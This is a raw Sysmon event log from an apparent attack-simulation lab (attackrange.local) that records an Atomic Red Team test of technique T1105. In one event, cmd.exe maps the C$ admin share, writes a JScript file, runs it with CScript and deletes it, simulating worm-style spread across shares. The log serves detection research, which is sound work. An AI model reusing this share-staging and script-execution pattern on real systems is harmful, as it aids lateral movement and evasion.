21:49:27.009{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E7-605B-7169-00000000AE01}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af43b9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3aaaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b349(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3e2d74(wow64) 154100x80000000000000005917310Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.000{896A638B-B3E7-605B-7169-00000000AE01}8032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pushd \\localhost\C$ & echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js & CScript.exe AtomicTestT1105.js //E:JScript & del AtomicTestT1105.js /Q >nul 2>&1 & del AtomicTestFileT1105.js /Q >nul 2>&1 & popd" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 22542200x80000000000000005917408Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.479{00000000-0000-0000-0000-000000000000}2252raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 354300x80000000000000005917407Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.475{00000000-0000-0000-0000-000000000000}2252<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1492-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000005917406Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:28.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917405Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:28.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917404Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:28.562{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE2DDD86E6638717148FB02B9C1B2CB,SHA256=8250010C27D6D9D180D0128D2D9CB440405E427D7805C5F3229EF6499B802E4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638436Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:28.960{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A0649A81C4971A4017F8BB300A10DF0,SHA256=9793EC0C18E671400F3D5AC474F2A0538C5B590EB7AC71577E53D86DDED83591,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917403Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.754{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1496-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local389ldap 354300x80000000000000005917402Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.754{896A638B-B5DB-6058-2E00-00000000AE01}2364C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1496-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local389ldap 354300x80000000000000005917401Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.733{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1495-false10.0.1.12-8000- 354300x80000000000000005917400Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.706{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1494-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local389ldap 354300x80000000000000005917399Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.706{896A638B-B5DB-6058-2E00-00000000AE01}2364C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1494-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local389ldap 354300x80000000000000005917398Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.703{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1493-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local445microsoft-ds 354300x80000000000000005917397Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.703{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1493-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local445microsoft-ds 354300x8000000000000000638435Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:24.366{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57249-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638434Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:28.117{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AF41BBA6F2D88214C3F9D6B7AAE2338,SHA256=21636F415C2A5A990049643F242BCA892C9F9DB52130F9668C829B6941AC6166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638433Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:28.117{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44F9EE30BF071EFC8FAF5DC28D968095,SHA256=ED7A8A5B56510F080F3A482B0FBA8722861731E08BBAC9CF44D0FF31A8FB747F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638437Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:29.976{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=330CAECEB3F23367DD871D5420DB1786,SHA256=3048A215B0929F688E8D8A5F5DE7837926D309509ED78BCD47B4D42E19CB05F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917411Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:29.792{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A783621459563124B132D01B37D4D40C,SHA256=2B008A4AAE3B406624A89AB8C00D50D0C049721649CE71894DE1F47CFBEDC0EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917410Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:29.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917409Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:29.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638438Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:30.992{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC8F55927BF366A1BE15D5BAF1372EC,SHA256=3CE76E82034D3A9AE297CCA7DF4962372D125165C0F842FDDBF46101D280F6FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917415Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:30.799{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9D7566DE3209F9ECC59462EEB0D378A,SHA256=BAA6CF649A501E73ABDDEFEBAF570D5515454A05BC3DA63C203113D9BA3C012B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917414Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:30.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917413Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:30.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917412Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:30.565{896A638B-FDE4-6058-4A12-00000000AE01}6364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=110595CEF9B4CBA210BA20B2379C084A,SHA256=7D73824D889500B0F5D9723AA57E5770140E65EEF42DCF932AD014F8B83C23F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917420Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:31.821{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E2CBEBB628A427B47CD270FD3784A5,SHA256=2BAE122ABF193923EAF495C6E083F73291B2E57BFAEA9624D600380060BA6206,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917419Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:29.230{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1497-false10.0.1.12-8089- 10341000x80000000000000005917418Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:31.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917417Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:31.723{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917416Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:31.611{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D67C753AB52916FEFA267D36DD89506,SHA256=DA8F9D9064F68C14429E5406A9C7BEE9041001304CA3AA3ADD752213ADBCD79D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917428Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:32.835{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52847FDDC810E8A0B9AEE131D0C9E4EB,SHA256=CF1B285E5F46ADCE0D4A5401DE680B1C159E5DBA3B14F2DB38A85140EC3F6800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638439Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:32.038{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A777DF438039BFB403A96C0397FBF9,SHA256=D6A4BB06A81C4F103B9B40C6C77B6AE926639E30E54D2C67E7B88BB37CE4E3E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917427Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:32.736{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917426Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:32.736{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917425Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:32.733{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917424Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:32.733{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917423Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:32.733{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917422Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:32.724{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917421Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 